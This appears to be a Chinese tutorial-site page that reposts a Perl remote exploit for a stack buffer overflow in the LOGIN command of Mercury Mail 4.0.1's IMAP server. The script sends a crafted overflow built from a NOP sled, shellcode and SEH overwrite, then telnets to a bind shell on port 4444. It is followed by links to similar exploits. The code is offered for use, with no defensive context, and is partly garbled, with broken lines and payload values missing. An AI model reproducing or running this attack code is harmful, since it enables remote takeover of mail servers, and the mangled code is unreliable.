手机
当前位置:查字典教程网 >网络安全 >Exploit >Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
摘要:#!/usr/bin/perl##http://www.securityfocus.com/bid/11775#credittoMutsfo...

#!/usr/bin/perl

#

# http://www.securityfocus.com/bid/11775

# credit to Muts for this vulnerability

# acaro [at] jervus.it

use IO::Socket::INET;

use Switch;

if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);

$socket or die "Cannot connect to host!n";

recv($socket, $reply, 1024, 0);

print "Response:" . $reply;

send $socket, $request, 0;

print "[ ] Sent 1st requestn";

recv($socket, $reply, 1024, 0);

print "Response:" . $reply;

sleep(1);

my $request ="x41" x 255;

send $socket, $request, 0;

print "[ ] Sent 2nd requestn";

sleep(1);

my $request=("x45" x7420).("x90" x10).$happy.("x90" x14).$shellcode.("x41" x8).$nextseh.$seh.("x90" x5).$jmp.("x90" x533);

send $socket, $request, 0;

print "[ ] Sent final requestn";

sleep(1);

close($socket);

print " connect on port 4444 of $host ...n";

sleep(3);

system("telnet $host 4444");

exit;

//http://www.leftworld.net

【Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit】相关文章:

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

Dana IRC 1.4a Remote Buffer Overflow Exploit

Debian Sarge Multiple IMAP Server Denial of Service Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

精品推荐
分类导航